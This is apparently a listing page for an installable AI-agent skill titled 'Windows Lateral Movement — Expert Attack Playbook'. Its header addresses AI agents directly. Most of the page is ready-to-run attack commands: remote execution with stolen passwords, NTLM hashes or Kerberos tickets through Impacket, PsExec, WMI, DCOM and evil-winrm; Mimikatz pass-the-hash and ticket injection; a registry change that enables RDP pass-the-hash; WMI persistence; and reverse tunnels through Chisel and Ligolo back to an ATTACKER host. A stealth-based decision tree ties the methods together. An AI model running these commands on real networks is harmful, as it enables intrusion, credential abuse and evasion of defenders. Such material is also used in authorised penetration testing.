windows-lateral-movement

Installs: 530
Rank: #6657

Install

npx skills add https://github.com/yaklang/hack-skills --skill windows-lateral-movement
SKILL: Windows Lateral Movement — Expert Attack Playbook

AI LOAD INSTRUCTION

Expert Windows lateral movement techniques. Covers PsExec, WMI, WinRM, DCOM, SMB, RDP, SSH, pass-the-hash, overpass-the-hash, pass-the-ticket, and pivoting. Base models miss execution method fingerprints, OPSEC trade-offs, and credential type requirements per method.

0. RELATED ROUTING

Before going deep, consider loading:

- windows-privilege-escalation after landing on a new host for local escalation
- windows-av-evasion when EDR blocks lateral movement tools
- active-directory-kerberos-attacks for Kerberos-based lateral (pass-the-ticket, delegation)
- active-directory-acl-abuse for ACL-based paths to new hosts

Advanced Reference

Also load CREDENTIAL_DUMPING.md when you need:

- LSASS dump techniques (MiniDump, comsvcs.dll, nanodump)
- SAM/SYSTEM/SECURITY extraction
- DPAPI, credential manager, cached domain credentials
- NTDS.dit extraction methods

1. REMOTE EXECUTION METHODS COMPARISON

| Method           | Port        | Cred Type                       | Creates Service?     | File on Disk? | OPSEC             | Admin Required?   |
|------------------|-------------|---------------------------------|----------------------|---------------|-------------------|-------------------|
| PsExec           | 445 (SMB)   | Password/Hash                   | Yes (PSEXESVC)       | Yes (.exe)    | Low               | Yes               |
| Impacket smbexec | 445         | Password/Hash                   | Yes (temp service)   | No            | Medium            | Yes               |
| Impacket atexec  | 445         | Password/Hash                   | No (scheduled task)  | No            | Medium            | Yes               |
| WMI              | 135+dynamic | Password/Hash                   | No                   | No            | High              | Yes               |
| WinRM            | 5985/5986   | Password/Hash/Ticket            | No                   | No            | High              | Yes (Remote Mgmt) |
| DCOM             | 135+dynamic | Password/Hash                   | No                   | No            | High              | Yes               |
| RDP              | 3389        | Password/Hash (RestrictedAdmin) | No                   | No            | Low (GUI session) | RDP access        |
| SSH              | 22          | Password/Key                    | No                   | No            | High              | SSH enabled       |
| SC               | 445         | Password/Hash                   | Yes (custom service) | Yes           | Low               | Yes               |

2. PSEXEC VARIANTS

Impacket PsExec

With password

psexec.py DOMAIN/administrator:password@TARGET_IP

With NTLM hash (pass-the-hash)

psexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

With Kerberos ticket

export KRB5CCNAME=admin.ccache
psexec.py -k -no-pass DOMAIN/administrator@target.domain.com

Impacket smbexec (Stealthier — No Binary Upload)

smbexec.py DOMAIN/administrator:password@TARGET_IP
smbexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

Impacket atexec (Scheduled Task)

atexec.py DOMAIN/administrator:password@TARGET_IP "whoami"
atexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP "whoami"

Sysinternals PsExec

PsExec64.exe \\TARGET -u DOMAIN\administrator -p password cmd.exe
PsExec64.exe \\TARGET -s cmd.exe & REM Run as SYSTEM (-s)
PsExec64.exe \\TARGET -accepteula -s -d cmd.exe /c "C:\temp\payload.exe"

3. WMI LATERAL MOVEMENT

Impacket wmiexec

wmiexec.py DOMAIN/administrator:password@TARGET_IP
wmiexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP

With Kerberos

export KRB5CCNAME=admin.ccache
wmiexec.py -k -no-pass DOMAIN/administrator@target.domain.com

PowerShell WMI process creation

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred

WMI event subscription persistence

$filterArgs = @{ EventNamespace = 'root\cimv2'; Name = 'Updater'; QueryLanguage = 'WQL'; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" }
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs

4. WINRM LATERAL MOVEMENT

evil-winrm (from Linux — with password)

evil-winrm -i TARGET_IP -u administrator -p password

evil-winrm (with hash)

evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH

evil-winrm (with Kerberos)

evil-winrm -i target.domain.com -r DOMAIN.COM

PowerShell remoting

$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred

Execute command remotely

Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }

Multiple targets simultaneously

Invoke-Command -ComputerName TARGET1,TARGET2 -Credential $cred -ScriptBlock { hostname; whoami }

5. DCOM LATERAL MOVEMENT

Stealthy — uses legitimate COM objects, no service creation.

MMC20.Application

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami > C:\temp\out.txt", "7")

ShellWindows

$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39", "TARGET"))
$item = $com.Item()
$item.Document.Application.ShellExecute("cmd.exe", "/c whoami > C:\temp\out.txt", "C:\Windows\System32", $null, 0)

ShellBrowserWindow

$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880", "TARGET"))
$com.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", "C:\Windows\System32", $null, 0)

Impacket dcomexec

dcomexec.py DOMAIN/administrator:password@TARGET_IP
dcomexec.py -hashes :NTLM_HASH DOMAIN/administrator@TARGET_IP -object MMC20

6. PASS-THE-HASH (PTH)

Use NTLM hash directly without knowing the plaintext password.

CrackMapExec — spray/check admin access

crackmapexec smb TARGETS -u administrator -H NTLM_HASH

Impacket tools (all support -hashes)

psexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET
smbexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET

evil-winrm

evil-winrm -i TARGET -u user -H NTLM_HASH

xfreerdp (Restricted Admin mode must be enabled)

xfreerdp /v:TARGET /u:administrator /pth:NTLM_HASH /d:DOMAIN

Mimikatz PTH (spawns new process with injected creds)

sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:HASH /run:cmd.exe

Enable Restricted Admin for RDP PTH

On target (requires admin): enable restricted admin

reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

7. OVERPASS-THE-HASH (PASS-THE-KEY)

Convert NTLM hash → Kerberos TGT → pure Kerberos authentication.

Request TGT with hash

getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache

Or with AES256 key

getTGT.py DOMAIN/user -aesKey AES256_KEY -dc-ip DC_IP

Use Kerberos for all subsequent tools

psexec.py -k -no-pass DOMAIN/user@target.domain.com
wmiexec.py -k -no-pass DOMAIN/user@target.domain.com

Mimikatz overpass-the-hash

sekurlsa::pth /user:user /domain:DOMAIN /ntlm:HASH /run:powershell.exe

New PowerShell session → klist shows Kerberos TGT

Advantage: Pure Kerberos auth avoids NTLM logging and detection.

8. PASS-THE-TICKET

Use existing .ccache ticket

export KRB5CCNAME=/path/to/admin.ccache
psexec.py -k -no-pass DOMAIN/admin@target.domain.com

Mimikatz — inject .kirbi ticket

kerberos::ptt ticket.kirbi

Verify

klist

Rubeus

Rubeus.exe ptt /ticket:base64_blob

9. PIVOTING THROUGH COMPROMISED HOSTS

SSH Tunnel / Port Forward

Dynamic SOCKS proxy through compromised host

ssh -D 1080 user@COMPROMISED_HOST

Use with proxychains

Local port forward (access internal service)

ssh -L 8888:INTERNAL_TARGET:445 user@COMPROMISED_HOST

Chisel (No SSH Needed)

On attacker (server)

chisel server --reverse -p 8080

On compromised host (client)

chisel client ATTACKER:8080 R:socks

Creates SOCKS5 proxy on attacker's port 1080

Ligolo-ng (Modern, Fast)

On attacker

ligolo-proxy -selfcert -laddr 0.0.0.0:11601

On compromised host

ligolo-agent -connect ATTACKER:11601 -retry -ignore-cert

In ligolo console

session

Select agent

start

Start tunnel

Add route: sudo ip route add INTERNAL_SUBNET/24 dev ligolo

10. LATERAL MOVEMENT DECISION TREE

Have credentials / hash — need to move laterally
│
├── What credentials do you have?
│   ├── Plaintext password → any method
│   ├── NTLM hash → PTH methods (§6)
│   │   ├── Need stealthier? → Overpass-the-Hash first (§7)
│   │   └── Direct use → psexec/wmiexec/evil-winrm with -H
│   ├── Kerberos ticket → Pass-the-Ticket (§8)
│   └── AES key → Overpass-the-Hash with -aesKey (§7)
│
├── OPSEC priority?
│   ├── High stealth needed
│   │   ├── WMI (no file on disk, no service) → wmiexec (§3)
│   │   ├── DCOM (uses legitimate COM) → dcomexec (§5)
│   │   └── WinRM (PowerShell remoting) → evil-winrm (§4)
│   ├── Moderate stealth
│   │   ├── smbexec (no binary upload) (§2)
│   │   └── atexec (scheduled task, auto-cleanup) (§2)
│   └── Low stealth acceptable
│       ├── PsExec (reliable, creates service) (§2)
│       └── RDP (interactive GUI) (§6)
│
├── Need to pivot to internal network?
│   ├── SSH available → SSH tunnel / SOCKS (§9)
│   ├── No SSH → Chisel or Ligolo-ng (§9)
│   └── Multiple hops → chain SOCKS proxies
│
├── Target hardening?
│   ├── SMB signing required → WMI, WinRM, or DCOM
│   ├── WinRM disabled → WMI or DCOM
│   ├── Firewall blocks 135/445 → RDP or SSH
│   └── Restricted Admin disabled → no RDP PTH → use other methods
│
└── Need to dump creds on new host?
    └── Load CREDENTIAL_DUMPING.md